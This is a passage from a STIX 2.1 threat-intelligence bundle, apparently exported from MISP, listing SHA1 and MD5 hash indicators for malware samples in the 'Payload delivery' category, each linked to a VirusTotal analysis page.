"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8067-fbf4-4c8a-92e8-4c7802de0b81",
|
|
"value": "https://www.virustotal.com/file/215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a/analysis/1434535951/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8068-b2f4-4a36-a104-41e402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:44.000Z",
|
|
"modified": "2017-03-29T09:37:44.000Z",
|
|
"description": "sample - Xchecked via VT: 3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d",
|
|
"pattern": "[file:hashes.SHA1 = '26656327fd1b3e30f3ad56cc9599f4151fb22394']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8069-f958-475a-b426-4d1b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:45.000Z",
|
|
"modified": "2017-03-29T09:37:45.000Z",
|
|
"description": "sample - Xchecked via VT: 3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d",
|
|
"pattern": "[file:hashes.MD5 = 'bfcda484284de8e40b9a1fd8b670bfb3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db806a-6aa0-48fb-b2b7-451302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:46.000Z",
|
|
"modified": "2017-03-29T09:37:46.000Z",
|
|
"first_observed": "2017-03-29T09:37:46Z",
|
|
"last_observed": "2017-03-29T09:37:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db806a-6aa0-48fb-b2b7-451302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db806a-6aa0-48fb-b2b7-451302de0b81",
|
|
"value": "https://www.virustotal.com/file/3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d/analysis/1434545121/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db806b-847c-4599-bfa4-4a6d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:47.000Z",
|
|
"modified": "2017-03-29T09:37:47.000Z",
|
|
"description": "sample - Xchecked via VT: bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662",
|
|
"pattern": "[file:hashes.SHA1 = 'a8e9b106219aa75abba67a544af7667751b26287']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db806c-8ca0-4f28-bc7f-4af302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:48.000Z",
|
|
"modified": "2017-03-29T09:37:48.000Z",
|
|
"description": "sample - Xchecked via VT: bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662",
|
|
"pattern": "[file:hashes.MD5 = 'bdfb474c6635ec0051ffa3713febd40c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db806d-1fb4-4e45-a481-413802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:49.000Z",
|
|
"modified": "2017-03-29T09:37:49.000Z",
|
|
"first_observed": "2017-03-29T09:37:49Z",
|
|
"last_observed": "2017-03-29T09:37:49Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db806d-1fb4-4e45-a481-413802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db806d-1fb4-4e45-a481-413802de0b81",
|
|
"value": "https://www.virustotal.com/file/bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662/analysis/1445658534/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db806e-de7c-4b23-a9b4-4bbb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:50.000Z",
|
|
"modified": "2017-03-29T09:37:50.000Z",
|
|
"description": "sample - Xchecked via VT: 780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07",
|
|
"pattern": "[file:hashes.SHA1 = 'a28cd600b40623daba0990146d4422d5dfc89bf0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db806f-e460-4277-b22d-4cc602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:51.000Z",
|
|
"modified": "2017-03-29T09:37:51.000Z",
|
|
"description": "sample - Xchecked via VT: 780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07",
|
|
"pattern": "[file:hashes.MD5 = '0690c3ebe02fff45df2c1f4e32aba55a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8070-9074-4807-8529-4b5602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:52.000Z",
|
|
"modified": "2017-03-29T09:37:52.000Z",
|
|
"first_observed": "2017-03-29T09:37:52Z",
|
|
"last_observed": "2017-03-29T09:37:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8070-9074-4807-8529-4b5602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8070-9074-4807-8529-4b5602de0b81",
|
|
"value": "https://www.virustotal.com/file/780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07/analysis/1439314312/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8071-073c-4456-95c7-49a402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:53.000Z",
|
|
"modified": "2017-03-29T09:37:53.000Z",
|
|
"description": "sample - Xchecked via VT: 413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056",
|
|
"pattern": "[file:hashes.SHA1 = '183b2a612e09ec45a053ddce4735bf7aab954a43']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8072-5b90-4b91-8ad4-455f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:54.000Z",
|
|
"modified": "2017-03-29T09:37:54.000Z",
|
|
"description": "sample - Xchecked via VT: 413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056",
|
|
"pattern": "[file:hashes.MD5 = 'ef4cccba181034c8416b50d1eccac07b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8073-d3ec-4635-a9ae-408202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:55.000Z",
|
|
"modified": "2017-03-29T09:37:55.000Z",
|
|
"first_observed": "2017-03-29T09:37:55Z",
|
|
"last_observed": "2017-03-29T09:37:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8073-d3ec-4635-a9ae-408202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8073-d3ec-4635-a9ae-408202de0b81",
|
|
"value": "https://www.virustotal.com/file/413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056/analysis/1438693696/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8073-522c-4de3-a378-483602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:55.000Z",
|
|
"modified": "2017-03-29T09:37:55.000Z",
|
|
"description": "sample - Xchecked via VT: 1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c",
|
|
"pattern": "[file:hashes.SHA1 = '13223f908c5347a79102619916ef850bbbc98911']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8074-7888-4d7c-8c67-4b8602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:56.000Z",
|
|
"modified": "2017-03-29T09:37:56.000Z",
|
|
"description": "sample - Xchecked via VT: 1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c",
|
|
"pattern": "[file:hashes.MD5 = 'a792b770d3697ff5e44edd561ac1c197']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8075-3410-43f8-bc45-4d9502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:57.000Z",
|
|
"modified": "2017-03-29T09:37:57.000Z",
|
|
"first_observed": "2017-03-29T09:37:57Z",
|
|
"last_observed": "2017-03-29T09:37:57Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8075-3410-43f8-bc45-4d9502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8075-3410-43f8-bc45-4d9502de0b81",
|
|
"value": "https://www.virustotal.com/file/1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c/analysis/1486859092/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8076-1c10-4f4d-b2f4-48d102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:58.000Z",
|
|
"modified": "2017-03-29T09:37:58.000Z",
|
|
"description": "sample - Xchecked via VT: 3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a",
|
|
"pattern": "[file:hashes.SHA1 = '22e332aec8f60f2ad6bd90d16b9c0005f4e45e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8077-0370-40dd-a4ec-41ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:59.000Z",
|
|
"modified": "2017-03-29T09:37:59.000Z",
|
|
"description": "sample - Xchecked via VT: 3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a",
|
|
"pattern": "[file:hashes.MD5 = '516a798b4689cb82289e1230ea8322a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8078-7118-4370-b60a-491e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:00.000Z",
|
|
"modified": "2017-03-29T09:38:00.000Z",
|
|
"first_observed": "2017-03-29T09:38:00Z",
|
|
"last_observed": "2017-03-29T09:38:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8078-7118-4370-b60a-491e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8078-7118-4370-b60a-491e02de0b81",
|
|
"value": "https://www.virustotal.com/file/3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a/analysis/1487180313/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8079-6234-4abd-a677-402302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:01.000Z",
|
|
"modified": "2017-03-29T09:38:01.000Z",
|
|
"description": "sample - Xchecked via VT: 7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402",
|
|
"pattern": "[file:hashes.SHA1 = '4aed31528e88a9d7f385e9b6d77d737109575813']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db807a-81b8-4d1d-82ba-461a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:02.000Z",
|
|
"modified": "2017-03-29T09:38:02.000Z",
|
|
"description": "sample - Xchecked via VT: 7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402",
|
|
"pattern": "[file:hashes.MD5 = 'c9ea4a175173b4eef6326f7688505f53']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db807c-a86c-47a5-b22d-4ddc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:04.000Z",
|
|
"modified": "2017-03-29T09:38:04.000Z",
|
|
"first_observed": "2017-03-29T09:38:04Z",
|
|
"last_observed": "2017-03-29T09:38:04Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db807c-a86c-47a5-b22d-4ddc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db807c-a86c-47a5-b22d-4ddc02de0b81",
|
|
"value": "https://www.virustotal.com/file/7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402/analysis/1487588821/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db807d-2884-4726-a485-47ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:05.000Z",
|
|
"modified": "2017-03-29T09:38:05.000Z",
|
|
"description": "sample - Xchecked via VT: a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3",
|
|
"pattern": "[file:hashes.SHA1 = '468f7ae20a797d997822658cbe475234f155f121']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db807e-fefc-4a7c-bd02-49f302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:06.000Z",
|
|
"modified": "2017-03-29T09:38:06.000Z",
|
|
"description": "sample - Xchecked via VT: a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3",
|
|
"pattern": "[file:hashes.MD5 = '1961282824e88ba2dd12ac19bcb8f68d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db807f-ae00-4a82-80c7-469c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:07.000Z",
|
|
"modified": "2017-03-29T09:38:07.000Z",
|
|
"first_observed": "2017-03-29T09:38:07Z",
|
|
"last_observed": "2017-03-29T09:38:07Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db807f-ae00-4a82-80c7-469c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db807f-ae00-4a82-80c7-469c02de0b81",
|
|
"value": "https://www.virustotal.com/file/a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3/analysis/1488892530/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8080-becc-4486-9733-4f4802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:08.000Z",
|
|
"modified": "2017-03-29T09:38:08.000Z",
|
|
"description": "sample - Xchecked via VT: ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b",
|
|
"pattern": "[file:hashes.SHA1 = '0965e393f6fd80388f0390c83391735d2abe8bd0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8081-03c0-4e51-a731-492c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:09.000Z",
|
|
"modified": "2017-03-29T09:38:09.000Z",
|
|
"description": "sample - Xchecked via VT: ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b",
|
|
"pattern": "[file:hashes.MD5 = '05e68a93c8c54de8a8b200d4bf22875b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8082-bee0-4015-8815-4ecc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:10.000Z",
|
|
"modified": "2017-03-29T09:38:10.000Z",
|
|
"first_observed": "2017-03-29T09:38:10Z",
|
|
"last_observed": "2017-03-29T09:38:10Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8082-bee0-4015-8815-4ecc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8082-bee0-4015-8815-4ecc02de0b81",
|
|
"value": "https://www.virustotal.com/file/ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b/analysis/1486662330/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8083-82bc-468d-a58d-485d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:11.000Z",
|
|
"modified": "2017-03-29T09:38:11.000Z",
|
|
"description": "sample - Xchecked via VT: 6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b",
|
|
"pattern": "[file:hashes.SHA1 = '0a22f774de1fc36406b0c34f4be4af3ca45ec9d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8084-c7b4-4f9f-be4a-4dcc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:12.000Z",
|
|
"modified": "2017-03-29T09:38:12.000Z",
|
|
"description": "sample - Xchecked via VT: 6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b",
|
|
"pattern": "[file:hashes.MD5 = 'c653b868a1a84eedf938d68acaf6973e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8085-4f7c-4ab1-8ecb-4f2c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:13.000Z",
|
|
"modified": "2017-03-29T09:38:13.000Z",
|
|
"first_observed": "2017-03-29T09:38:13Z",
|
|
"last_observed": "2017-03-29T09:38:13Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8085-4f7c-4ab1-8ecb-4f2c02de0b81"
|
|
],
|
|
"labels": [
|
|
